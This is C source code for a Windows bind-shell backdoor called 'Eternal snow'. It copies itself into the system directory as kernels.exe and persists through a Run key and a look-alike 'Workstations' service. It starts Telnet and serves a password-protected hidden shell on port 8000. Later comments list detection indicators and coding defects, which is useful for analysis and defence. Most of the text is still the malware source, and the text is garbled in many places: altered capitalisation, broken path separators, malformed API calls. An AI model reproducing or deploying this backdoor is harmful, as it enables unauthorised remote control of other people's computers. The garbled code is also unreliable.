/*
Delphiscn eternal snow sans shell Version 1.0
This backdoor is written by delphiscn. It supports Windows NT/2000/XP/2003.
You can use netcat (nc) to control a remote computer that is running this software.
Compiled and tested on Windows XP SP2 CN; 2000/2003 not tested.
Can not run in Windows 98/me
Details
Eternal snow will create a service (workstations) on the remote system. And bind Service computer on port 8000.
Then. It will also try to start Telnet service in the remote system which is support for NT.
An attacker can control it if he knows the password -- Neverland.
Reference
1. msdn
2.www.xfocus.org
More information
Delphiscn@www.EvilOctal.com
Cnblater (AT) Hotmail (DOT) com
Http://spaces.msn.com/members/delphiscn
*/
# Include <winsock2.h>
# Include <stdio. h>
# Include <stdlib. h>
# Include <windows. h>
# Include <winsvc. h>
# Include <psapi. h>
# Pragma comment (Lib, "psapi. lib ")
# Pragma comment (Lib, "ws2_32.lib ")
// The only authentication this backdoor performs is a substring match against
// this literal (see main()); it is a fixed, cleartext secret baked into the
// binary and therefore a reliable static signature for detection.
# Define password "Neverland"
// Forward declarations for the installer/persistence helpers defined below.
Bool Reg (char * szexecfile );
Void oncreate ();
Void starttelnet ();
Void help ();
// Persistence via the HKLM Run key.
//
// Opens HKLM\Software\Microsoft\Windows\CurrentVersion\Run with KEY_ALL_ACCESS
// (the "//" separators in the literal look like extraction garbling of "\\" --
// TODO confirm against the original). If no value named "DLLs" exists, writes
// a REG_SZ value named "kernels" whose data is szexecfile (the copied binary
// path built in main()).
//
// Returns false if the key cannot be opened or the value cannot be written,
// true otherwise.
//
// Defender notes (IOCs): Run value "kernels" -> %SystemDirectory%\kernels.exe.
//
// Review notes:
//  - The presence check queries "DLLs" but the write targets "kernels", so the
//    check never sees what this function itself writes; "kernels" is rewritten
//    on every run in which "DLLs" is absent.
//  - malloc() is unchecked; on the regsetvalueex failure path the 80-byte
//    buffer and hkey are leaked (no free / RegCloseKey before return).
Bool Reg (char * szexecfile)
{
Hkey;
Lpctstr data_set = "software // Microsoft // windows // CurrentVersion // run //";
Long snow0 = (: regopenkeyex (HKEY_LOCAL_MACHINE, data_set, 0, key_all_access, & hkey ));
If (snow0! = Error_success) Return (false );
// Scratch buffer for the "DLLs" query; its contents are never examined.
Lpbyte username_get = (unsigned char *) malloc (sizeof (byte) * 80 );
DWORD cbdata_1 = 80;
DWORD dwtype;
Long snow1 =: regqueryvalueex (hkey, "DLLs", 0, & dwtype, username_get, & cbdata_1 );
If (snow1! = Error_success)
{
DWORD setsize;
// strlen + 1 so the terminating NUL is stored with the REG_SZ data.
Setsize = strlen (szexecfile) + 1;
Dwtype = REG_SZ;
Long snow3 =: regsetvalueex (hkey, "kernels", 0, dwtype, (const unsigned char *) szexecfile, setsize );
// Early return leaks username_get and hkey.
If (snow3! = Error_success) {return (false );}
}
Free (username_get );
: Regclosekey (hkey );
Return (true );
}
// Enables or disables one named privilege on the current process token.
//
// lpszprivilegename: privilege name constant (callers in this file pass
//                    se_debug_name).
// benable:           true -> SE_PRIVILEGE_ENABLED, false -> attribute 0.
//
// Return value is not a usable status: 0 is returned both when
// OpenProcessToken fails and on success; 1 only when LookupPrivilegeValue
// fails. No caller in this file inspects it.
//
// Review notes:
//  - AdjustTokenPrivileges' result is ignored, so a privilege the caller does
//    not hold is silently not enabled (the call also reports
//    ERROR_NOT_ALL_ASSIGNED via GetLastError even when it "succeeds").
//  - On the LookupPrivilegeValue failure path htoken is not closed.
//  - SE_DEBUG is requested before Service Control Manager calls; presumably
//    cargo-culted, since the SCM calls below do not appear to need it --
//    TODO confirm.
Int enableprivilege (lpctstr lpszprivilegename, bool benable)
/*
Thanks to sunlion [e.s. T]
*/
{
Handle htoken;
Token_privileges TP;
Luid;
If (! Openprocesstoken (getcurrentprocess (), token_adjust_privileges |
Token_query | token_read, & htoken ))
Return 0;
// Leaks htoken on this path.
If (! Lookupprivilegevalue (null, lpszprivilegename, & luid ))
Return 1;
TP. privilegecount = 1;
TP. Privileges [0]. luid = luid;
TP. Privileges [0]. Attributes = (benable )? Se_privilege_enabled: 0;
// Return value unchecked.
Adjusttokenprivileges (htoken, false, & TP, null );
Closehandle (htoken );
Return 0;
}
// Prints the author banner to the local console (stdout), not to the remote
// client. The "/N" sequences look like extraction garbling of "\n" -- TODO
// confirm; the third line has no newline at all.
Void help ()
{
Printf ("Eternal sonw release shell in Windows NT System Support for 2000/XP/2003 version 1.0/N ");
Printf ("code by Delphiscn@www.EvilOctal.com E-mail: cnblaster (AT) Hotmail (DOT) COM/N ");
Printf ("complied in Windows XP SP2 CN 2005-08 ");
Return;
}
// Entry point: installer + single-shot bind shell.
//
// Sequence, as written:
//  1. Copies its own image to %SystemDirectory%\kernels.exe (unless already
//     running from there), adds a Run-key value (Reg), registers a service
//     named "Workstations" (oncreate), and starts the "Telnet" service
//     (starttelnet). Note that nothing in this file calls
//     StartServiceCtrlDispatcher, so the binary does not behave as a real
//     service when the SCM launches it.
//  2. Listens on TCP 8000, accepts exactly ONE client, sends the banner
//     "welcome hacker" and a password prompt, then checks the reply for the
//     substring "Neverland".
//  3. Spawns a hidden child process with stdin/stdout/stderr redirected over
//     anonymous pipes and relays bytes between the socket and the pipes until
//     an error, then exits.
//
// Defender notes (network/host IOCs visible in this code): TCP/8000 listener;
// banner strings "welcome hacker", "your password is :", "error password
// please try it again"; file kernels.exe in the system directory; service
// "Workstations"; Run value "kernels"; an unexpected start of the Telnet
// service; system("cls.exe") executed from the system directory context.
//
// Review notes (defects in the code as shown):
//  - GetModuleFileName writes up to 255 chars into argv[0], a buffer whose
//    size is only that of the actual command-line argument: out-of-bounds
//    write / undefined behaviour.
//  - sznewplace is filled with up to 255 chars and then strcat'd with no
//    bounds check.
//  - buff is never zeroed or NUL-terminated before strstr(); the recv() call
//    shown has only three arguments (garbled -- TODO confirm), and its
//    return value is not checked, so strstr may scan uninitialized stack.
//  - Authentication is a substring match, and on failure the socket is
//    closed but execution FALLS THROUGH: the "OK" message is sent and the
//    child process is still spawned against the closed socket.
//  - lbytesread is unsigned long but receives recv()'s int result; a
//    SOCKET_ERROR (-1) return -- including the 50 s SO_RCVTIMEO expiry set
//    above -- becomes 0xFFFFFFFF, the `<= 0` guard does not fire, and
//    WriteFile is asked to read 4 GiB from a 4096-byte buffer.
//  - PeekNamedPipe's result is ignored; lbytesread is reused across the
//    peek/read/recv paths; pipe handles, process handles and WSA state are
//    never released; STARTUPINFO.cb is never set; the CreateProcess call
//    shown has too few arguments and the command-line declaration is
//    garbled (reads "kernels.exe" here -- TODO confirm against original).
//  - SO_RCVTIMEO is set on the listening socket, where it has no effect on
//    accept(); only the client socket's timeout matters.
//
// Returns 0 after the single session ends (or when Reg fails), -1 on
// WSAStartup/accept failure.
Int main (INT argc, char * argv [])
{
// Overwrites argv[0] with the module path -- see note on buffer size above.
Getmodulefilename (null, argv [0], 255 );
Char sznewplace [255];
Getsystemdirectory (sznewplace, 255 );
// "//" presumably garbled "\\" -- TODO confirm. Unbounded strcat.
Strcat (sznewplace, "// kernels.exe ");
// Self-copy into the system directory unless already running from there.
If (strcmp (argv [0], sznewplace )! = 0)
{Copyfile (argv [0], sznewplace, false );}
// Run-key persistence; failure aborts everything else.
If (! Reg (sznewplace ))
{Return 0 ;}
Oncreate ();
Starttelnet ();
// Shells out to "cls.exe" via the command interpreter; no such program is
// shipped with Windows, so this most likely fails silently -- TODO confirm.
System ("cls.exe ");
Help ();
Wsadata;
Char buff [4096];
Int eternal;
If (eternal = wsastartup (makeword (2, 2), & wsadata ))! = 0)
{
Printf ("wsastartup failed: % d/N", eternal );
Return-1;
}
// Hard-coded listening port.
Int Port = 8000;
Int remoteserver, localclient;
Struct sockaddr_in addrserver, addrclient;
// Protocol strings sent to the remote client (network IOCs).
Char * MSG = "/n/R welcome hacker ";
Char * getpass = "/R/n your password is :";
Char * passok = "/R/n OK ";
Char * error = "/R/n error password please try it again ";
Remoteserver = socket (af_inet, sock_stream, 0 );
Addrserver. sin_family = af_inet;
Addrserver. sin_port = htons (port );
Addrserver. sin_addr.s_addr = addr_any;
// 50 s receive timeout; meaningless on a listening socket.
Int timeout = 50000;
Setsockopt (remoteserver, sol_socket, so_rcvtimeo, (char *) & timeout, sizeof (timeout ));
Uint breuser = 1;
Setsockopt (remoteserver, sol_socket, so_reuseaddr, (char *) & breuser, sizeof (breuser ));
// bind/listen results unchecked.
BIND (remoteserver, (struct sockaddr *) & addrserver, sizeof (addrserver ));
Listen (remoteserver, 5 );
Printf ("BIND server is OK/n % d", Port );
Int ilen = sizeof (addrclient );
// Exactly one client is ever accepted.
Localclient = accept (remoteserver, (struct sockaddr *) & addrclient, & ilen );
If (localclient! = Invalid_socket)
{
// 50 s receive timeout on the client socket; see the unsigned-recv note
// above for how the timeout is (mis)handled in the relay loop.
Int itimeout = 50000;
Setsockopt (localclient, sol_socket, so_rcvtimeo, (char *) & itimeout, sizeof (itimeout ));
}
Else return-1;
Send (localclient, MSG, strlen (MSG), 0 );
Send (localclient, getpass, strlen (getpass), 0 );
// Three-argument recv (garbled -- TODO confirm); result unchecked, buff not
// terminated before the strstr below.
Recv (localclient, buff, 0 );
// Substring match against the compiled-in password.
If (! (Strstr (buff, password )))
{
Send (localclient, error, strlen (error), 0 );
Printf ("/R/n Password error! ");
// No return/exit here: control falls through to the shell spawn below
// with localclient already closed.
Closesocket (localclient );
}
Send (localclient, passok, strlen (passok), 0 );
// pipe1: child stdout/stderr -> us; pipe2: us -> child stdin.
Handle hreadpipe1, hwritepipe1, hreadpipe2, hwritepipe2;
Unsigned long lbytesread;
Security_attributes SA;
// Hard-coded sizeof(SECURITY_ATTRIBUTES) for 32-bit builds.
SA. nlength = 12;
SA. lpsecuritydescriptor = 0;
// Inheritable so the child inherits the pipe ends as its std handles.
SA. binherithandle = true;
Createpipe (& hreadpipe1, & hwritepipe1, & SA, 0 );
Createpipe (& hreadpipe2, & hwritepipe2, & SA, 0 );
Startupinfo siinfo;
// Garbled declaration of the child command line -- TODO confirm what the
// original spawned.
Char character line [] = "kernels.exe ";
Process_information processinformation;
// siinfo.cb is never set after zeroing.
Zeromemory (& siinfo, sizeof (siinfo ));
Siinfo. dwflags = startf_useshowwindow | startf_usestdhandles;
Siinfo. wshowwindow = sw_hide;
Siinfo. hstdinput = hreadpipe2;
Siinfo. hstdoutput = siinfo. hstderror = hwritepipe1;
Printf ("/R/n pipe create OK! ");
// Garbled CreateProcess (too few arguments); result 'bread' is never used.
Int bread = CreateProcess (null, cmdline, null, & siinfo, & processinformation );
// Relay loop: drain child output to the socket, otherwise block on the
// socket and forward input to the child.
While (1)
{
// Return value ignored; if the pipe is broken lbytesread is stale.
Int ret = peeknamedpipe (hreadpipe1, buff, 1024, & lbytesread );
If (lbytesread)
{
Ret = readfile (hreadpipe1, buff, lbytesread, & lbytesread, 0 );
If (! RET) break;
Ret = Send (localclient, buff, lbytesread, 0 );
If (Ret <= 0) break;
}
Else
{
// int -> unsigned long: a -1 error/timeout becomes 0xFFFFFFFF and
// the guard below never fires.
Lbytesread = Recv (localclient, buff, 1024,0 );
If (lbytesread <= 0) break;
Ret = writefile (hwritepipe2, buff, lbytesread, & lbytesread, 0 );
}
}
// Pipes, process handles and WSA state are not released.
Closesocket (localclient );
Closesocket (remoteserver );
Return 0;
}
// Service-based persistence.
//
// Registers an auto-start, interactive, own-process Win32 service named
// "Workstations" (both service name and display name) whose binary path is
// %SystemDirectory%\kernels.exe. The name is one letter away from the
// built-in "Workstation" service's display name -- presumably chosen to
// blend in; treat a service literally named "Workstations" as an IOC.
//
// No return value; every failure is silent (no error handling or logging).
//
// Review notes:
//  - The binary this points at never calls StartServiceCtrlDispatcher (see
//    main()), so the SCM will not get a valid service handshake from it.
//  - The SCM handle is closed only when CreateService FAILS; on success only
//    the service handle is closed and SCM leaks.
//  - The request for SE_DEBUG is unrelated to the SCM calls that follow --
//    TODO confirm it is not needed.
//  - "//" in the path literal presumably garbled "\\"; unbounded strcat.
Void oncreate ()
{
Char sznewplace [255];
Getsystemdirectory (sznewplace, 255 );
Strcat (sznewplace, "// kernels.exe ");
Enableprivilege (se_debug_name, true );
SC _handle SCM;
SC _handle SCV;
SCM =: openscmanager (null, null, SC _manager_all_access );
If (SCM! = NULL)
{
// Service name / display name both "Workstations"; auto-start at boot.
SCV =: createservice (SCM,
"Workstations ",
"Workstations ",
Service_all_access,
Service_win32_own_process, service_interactive_process,
Service_auto_start,
Service_error_ignore,
Sznewplace,
Null, null );
If (SCV! = NULL)
{
// SCM handle is leaked on this (success) path.
: Closeservicehandle (SCV );
}
Else
{
: Closeservicehandle (SCM );
}
}
}
// Starts the system "Telnet" service if it can be opened.
//
// Opens the SCM with SC_MANAGER_ALL_ACCESS, opens the service named "Telnet"
// with SERVICE_ALL_ACCESS, calls StartService with no arguments, and closes
// both handles. All return values are ignored; nothing is logged.
//
// Defender note: an unexpected transition of the Telnet service to running,
// especially shortly after a new "Workstations" service appears, is a useful
// host-based indicator for this sample.
//
// Review note: SE_DEBUG is requested first but is unrelated to opening or
// starting a service -- TODO confirm it is not needed.
Void starttelnet ()
{
Enableprivilege (se_debug_name, true );
SC _handle SCM;
SC _handle SCV;
SCM =: openscmanager (null, null, SC _manager_all_access );
If (SCM! = NULL)
{
SCV =: openservice (SCM, "Telnet", service_all_access );
If (SCV! = NULL)
{
// Result unchecked; the service may already be running or disabled.
: Startservice (SCV, 0, null );
: Closeservicehandle (SCV );
}
: Closeservicehandle (SCM );
}
}
/*
Compiled with Visual C ++. net
Good luck ^. ^
*/